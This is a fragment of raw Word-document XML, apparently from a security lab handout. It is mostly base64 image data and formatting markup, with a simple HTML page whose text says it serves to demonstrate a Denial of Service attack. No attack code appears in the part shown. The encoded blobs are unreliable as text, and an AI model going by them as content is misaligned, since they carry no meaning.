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&#10;UQ3zBV8G0uRJgTiys1wpkEUu/08ofg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WVNgGoDAABkCAAADgAAAAAAAAAAAAAAAAA8AgAAZHJzL2Uyb0RvYy54bWxQSwEC&#10;LQAKAAAAAAAAACEAscoKlSQrAAAkKwAAFQAAAAAAAAAAAAAAAADSBQAAZHJzL21lZGlhL2ltYWdl&#10;MS5qcGVnUEsBAi0AFAAGAAgAAAAhAP43E3/gAAAACgEAAA8AAAAAAAAAAAAAAAAAKTEAAGRycy9k&#10;b3ducmV2LnhtbFBLAQItABQABgAIAAAAIQBYYLMbugAAACIBAAAZAAAAAAAAAAAAAAAAADYyAABk&#10;cnMvX3JlbHMvZTJvRG9jLnhtbC5yZWxzUEsFBgAAAAAGAAYAfQEAACczAAAAAA==&#10;">
                <v:shape id="Image 32" o:spid="_x0000_s1027" type="#_x0000_t75" style="position:absolute;left:95;top:95;width:22771;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2YwgAAANsAAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9fa8JA&#10;EMTfhX6HYwu+6aUqpURPkVahTwX/tM9rbk2iub00t8b47T2h0MdhZn7DzBadq1RLTSg9G3gZJqCI&#10;M29Lzg3sd+vBG6ggyBYrz2TgRgEW86feDFPrr7yhdiu5ihAOKRooROpU65AV5DAMfU0cvaNvHEqU&#10;Ta5tg9cId5UeJcmrdlhyXCiwpveCsvP24gzQav914MmvtN8knNxOHz+y3hnTf+6WU1BCnfyH/9qf&#10;1sB4BI8v8Qfo+R0AAP//AwBQSwECLQAUAAYACAAAACEA2+H2y+4AAACFAQAAEwAAAAAAAAAAAAAA&#10;AAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQBa9CxbvwAAABUBAAALAAAA&#10;AAAAAAAAAAAAAB8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQCPTL2YwgAAANsAAAAPAAAA&#10;AAAAAAAAAAAAAAcCAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAMAAwC3AAAA9gIAAAAA&#10;">
                  <v:imagedata r:id="rId31" o:title=""/>
                </v:shape>
                <v:shape id="Graphic 33" o:spid="_x0000_s1028" style="position:absolute;left:47;top:47;width:22866;height:9023;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="2286635,9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xxQAAANsAAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9Ra8Iw&#10;FIXfB/sP4Qp7m4krDK1GkcE2ByKbiuDbpbm2xeamNFmb/ftFGOzxcM75DmexirYRPXW+dqxhMlYg&#10;iAtnai41HA+vj1MQPiAbbByThh/ysFre3y0wN27gL+r3oRQJwj5HDVUIbS6lLyqy6MeuJU7exXUW&#10;Q5JdKU2HQ4LbRj4p9Swt1pwWKmzppaLiuv+2Grb4WcZdnJ2HPrbvmw91mqnsTeuHUVzPQQSK4T/8&#10;194YDVkGty/pB8jlLwAAAP//AwBQSwECLQAUAAYACAAAACEA2+H2y+4AAACFAQAAEwAAAAAAAAAA&#10;AAAAAAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQBa9CxbvwAAABUBAAAL&#10;AAAAAAAAAAAAAAAAAB8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQAXG6/xxQAAANsAAAAP&#10;AAAAAAAAAAAAAAAAAAcCAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAMAAwC3AAAA+QIAAAAA&#10;" path="m,902309r2286635,l2286635,,,,,902309xe" filled="f">
                  <v:path arrowok="t"/>
                </v:shape>
                <w10:wrap type="topAndBottom" anchorx="page"/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Create</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Simple</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Website</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="503385E1" w14:textId="77777777" w:rsidR="00034D15" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="1039"/>
        </w:tabs>
        <w:spacing w:before="19"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t>Code:</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>&lt;/style&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63A3DF5B" w14:textId="77777777" w:rsidR="00034D15" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="1"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>&lt;/head&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20BC7F00" w14:textId="77777777" w:rsidR="00034D15" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="1238"/>
        </w:tabs>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>&lt;body&gt;</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>&lt;div</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>class="container"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A60EDC6" w14:textId="77777777" w:rsidR="00034D15" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="1" w:line="229" w:lineRule="exact"/>
        <w:ind w:left="763"/>
      </w:pPr>
      <w:r>
        <w:t>&lt;h1&gt;Welcome</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-13"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>to</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-9"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>My</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-13"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Website&lt;/h1&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="738ECFC5" w14:textId="77777777" w:rsidR="00034D15" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="229" w:lineRule="exact"/>
        <w:ind w:left="763"/>
      </w:pPr>
      <w:r>
        <w:t>&lt;p&gt;This</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>is</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>simple</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>website</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>for</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>demonstrating</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>Denial</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>of</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Service</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>attack.&lt;/p&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48C5A8BC" w14:textId="77777777" w:rsidR="00034D15" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="562"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="487592960" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="4D2EFF48" wp14:editId="1F0454DC">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>923925</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>155624</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2944495" cy="250190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4495" cy="2501900"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="2944495" cy="2501900"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                        <pic:nvPicPr>
                          <pic:cNvPr id="35" name="Image 35"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId32" cstate="print"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="9525" y="9461"/>
                            <a:ext cx="2925445" cy="2482596"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                      <wps:wsp>
                        <wps:cNvPr id="36" name="Graphic 36"/>
